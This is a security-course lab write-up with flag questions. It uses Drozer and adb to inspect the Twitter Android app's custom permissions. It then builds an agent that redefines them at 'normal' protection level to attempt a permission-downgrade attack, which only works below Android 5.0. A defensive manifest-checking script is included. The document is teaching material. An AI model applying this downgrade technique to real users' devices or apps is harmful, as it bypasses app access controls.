M 502: Protection Level Downgrade (30 pts)

What You Need for This Project

Purpose

To practice using Drozer to examine Android internals. The attack will fail unless you have a really old version of Android, below 5.0, which is unlikely.

Connecting with ADB

On Kali, in a Terminal, execute this command:
ip addr
Find your IP address, as highlighted in the image below.

To find your Android device, execute this command, replacing the IP address with the IP address you found above, including the CIDR suffix "/24".

netdiscover -r 172.16.123.155/24
Netdiscover finds the devices on your network. Find the one that is not from "VMware", as highlighted in the image below.

Execute this command to connect to your Android device, replacing the IP address with the IP address of the device you determined in the previous step.

adb connect 172.16.123.171
Adb connects, as shown below.

Launching the Drozer Agent

On your Android emulator, launch the Drozer agent and make sure the Server is running, as shown below.

If you don't have a Drozer agent on your emulator, execute these commands to install one:

wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk
adb install drozer-agent-2.3.4.apk

Port Forwarding

On Kali, execute this command to expose the agent's port.
adb forward tcp:31415 tcp:31415
The command completes without errors, as shown below.

Installing the Twitter App

On your Android emulator, install Twitter from the App store, as shown below.

Viewing Twitter App Permissions

In Kali, in a Terminal, at the # bash prompt, execute these commands:
drozer console connect
run app.package.info -a com.twitter.android
Information about the app appears, starting with general information as shown below.

At the end, there are three permissions the Twitter app defines, as shown below:

I was unable to find out what "READ_DATA" does in detail, but we can learn more about the other two permissions.

To see the app's components, execute this command:

run app.package.attacksurface com.twitter.android
Twitter uses several activities, "broadcast receivers", and services, but no "content providers", as shown below.

Understanding the AUTH_APP Permission

To see more about the activities, execute this command:
run app.activity.info -a com.twitter.android
We see that the AUTH_APP permission controls access to the AuthorizeAppActivity activity, as shown below.

Understanding the RESTRICTED Permission

To see more about the broadcast receivers, execute this command:
run app.broadcast.info -a com.twitter.android
We see that the RESTRICTED permission controls access to the AppBroadcastReceiver receiver, as shown below.

Viewing the Protection Levels

To see the protection levels of these permissions, execute these commands:
run information.permissions --permission com.twitter.android.permission.READ_DATA
run information.permissions --permission com.twitter.android.permission.RESTRICTED
run information.permissions --permission com.twitter.android.permission.AUTH_APP
exit
As shown below, READ_DATA and RESTRICTED have the signature protection level, and AUTH_APP is marked as dangerous.

The signature-level permissions are only available to apps signed with the same certificate as the app that defines them, and the dangerous permission will pop a box up, requesting permission from the user.

Downgrading Java

Drozer can't sign apps with recent Java versions, so we need to downgrade Java.

Execute these commands to do that.

apt update
apt install openjdk-8-jdk -y
If an "Outdated processor microcode" box appears, press Enter.

Execute this command to reboot Kali.

reboot
Execute this command to select the default version of javac, the Java compiler:
update-alternatives --config javac
Find "java-8" on the list and select it. When I did it, that was item 2 as shown below.

Execute this command to select the default version of java:

update-alternatives --config java
Find "java-8" on the list and select it. When I did it, that was item 2 as shown below.

Building a Drozer App

To build a Drozer app that requests the permissions defined by Twitter, in Kali, in a Terminal, at the # bash prompt, execute this command:
drozer agent build --permission \
com.twitter.android.permission.READ_DATA \
com.twitter.android.permission.RESTRICTED \
com.twitter.android.permission.AUTH_APP
The agent is built and placed in the /tmp directory. Note the path to the agent, highlighted in the image below.

Reconnecting with ADB

Execute this command to connect to your Android device, replacing the IP address with the IP address of the device you determined previously.
adb connect 172.16.123.171
Adb connects, as shown below.

Monitoring the Log

Execute these commands to clear old log entries and monitor the Android log:
adb logcat -c
adb logcat | grep perm
Leave this window running, as shown below.

Installing the Agent

On Kali, open a second Terminal window. Execute these commands to remove the old agent and install the new one.

In the second command, adjust the path to lead to the APK file you built previously with Drozer.

adb uninstall com.mwr.dz
adb install /tmp/tmpzXbifs/agent.apk
The agent installs, as shown in the upper window in the image below.

The log shows that the app was not granted these two permissions:

as shown in the lower window in the image below.

This makes sense, because those are signature-level permissions, and the Drozer agent is not signed with the Twitter certificate.

Uninstalling Twitter and the Drozer Agent

On Kali, execute these commands:
adb uninstall com.mwr.dz
adb uninstall com.twitter.android
The operations succeed, as shown below.

Building a Drozer Agent that Defines Twitter Permissions

In Kali, in a Terminal, at the # bash prompt, execute this command:
drozer agent build --define-permission \
com.twitter.android.permission.READ_DATA normal \
com.twitter.android.permission.RESTRICTED normal \
com.twitter.android.permission.AUTH_APP normal --permission \
com.twitter.android.permission.READ_DATA \
com.twitter.android.permission.RESTRICTED \
com.twitter.android.permission.AUTH_APP
The agent is built and placed in the /tmp directory. Note the path to the agent, highlighted in the image below.

Installing the New Agent

On Kali, open a second Terminal window. Execute these commands to remove the old agent and install the new one.

In the second command, adjust the path to lead to the APK file you built previously with Drozer.

adb install /tmp/tmp_URMcR/agent.apk
The agent installs, as shown below.

Installing the Twitter App Again

On your Android emulator, install Twitter from the App store again, as shown below.

If you are using Android 5.0 or above, the installation should fail with the error message shown below.
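
A defender-side check for the condition this project creates, as an added example that is not part of the original project or of Drozer: it compares the permissions declared in decoded manifests and reports any permission that a second package redefines at a weaker protection level. The two manifests are constructed samples based on the permission names and levels shown above, and the function names are assumptions of this example.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

NS = "{http://schemas.android.com/apk/res/android}"
# Base protection levels, weakest to strongest.
RANK = {"normal": 0, "dangerous": 1, "signature": 2, "signatureOrSystem": 2}

# Constructed sample: the levels the page reports for the Twitter app.
OWNER_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.twitter.android">
  <permission android:name="com.twitter.android.permission.READ_DATA" android:protectionLevel="signature"/>
  <permission android:name="com.twitter.android.permission.RESTRICTED" android:protectionLevel="signature"/>
  <permission android:name="com.twitter.android.permission.AUTH_APP" android:protectionLevel="dangerous"/>
</manifest>"""

# Constructed sample: an agent that defines the same names as "normal".
# READ_DATA omits the attribute on purpose to exercise the default level.
AGENT_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.mwr.dz">
  <permission android:name="com.twitter.android.permission.READ_DATA"/>
  <permission android:name="com.twitter.android.permission.RESTRICTED" android:protectionLevel="normal"/>
  <permission android:name="com.twitter.android.permission.AUTH_APP" android:protectionLevel="normal"/>
</manifest>"""


def defined_permissions(manifest_xml):
    """Return (package, {permission name: base protection level})."""
    root = ET.fromstring(manifest_xml)
    perms = {}
    for node in root.findall("permission"):
        # protectionLevel defaults to "normal"; drop flags such as "|privileged".
        level = node.get(NS + "protectionLevel", "normal").split("|")[0]
        perms[node.get(NS + "name")] = level
    return root.get("package"), perms


def find_downgrades(manifests):
    """List permissions that another package defines at a weaker level."""
    seen = defaultdict(list)
    for xml_text in manifests:
        package, perms = defined_permissions(xml_text)
        for name, level in perms.items():
            seen[name].append((package, level))
    findings = []
    for name, defs in sorted(seen.items()):
        strongest = max(defs, key=lambda d: RANK.get(d[1], 0))
        for package, level in defs:
            if RANK.get(level, 0) < RANK.get(strongest[1], 0):
                findings.append((name, package, level, strongest[0], strongest[1]))
    return findings
```

Each finding is a tuple of permission name, the package with the weaker definition and its level, then the package with the strongest definition and its level.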


M 502a: Recording Your Success (15 pts)

Find the text covered by a green box in the image above. That's the flag.

Extra Credit: Use Android 4.3 (15 pts)

Install an Android 4.3 emulator.

I used the one shown below.

You can't use the Gapps button to install Google Play. Instead, you need to install these two components one by one, rebooting after each installation.

https://samsclass.info/128/proj/Genymotion-ARM-Translation_v1.1.zip

https://samsclass.info/128/proj/gapps-jb-20130813-signed.zip

Then repeat the project. This time Twitter will install.

Launch the Drozer agent, configure port forwarding, and execute these commands to see Twitter's protection levels:

drozer console connect
run information.permissions --permission com.twitter.android.permission.READ_DATA
run information.permissions --permission com.twitter.android.permission.RESTRICTED
run information.permissions --permission com.twitter.android.permission.AUTH_APP
exit
The permissions are all normal, as shown below.


M 502b: Recording Your Success (15 pts)

Find the text covered by a green box in the image above. That's the flag.

Posted 2-8-19 by Sam Bowne
Changed to a CTF 3-1-19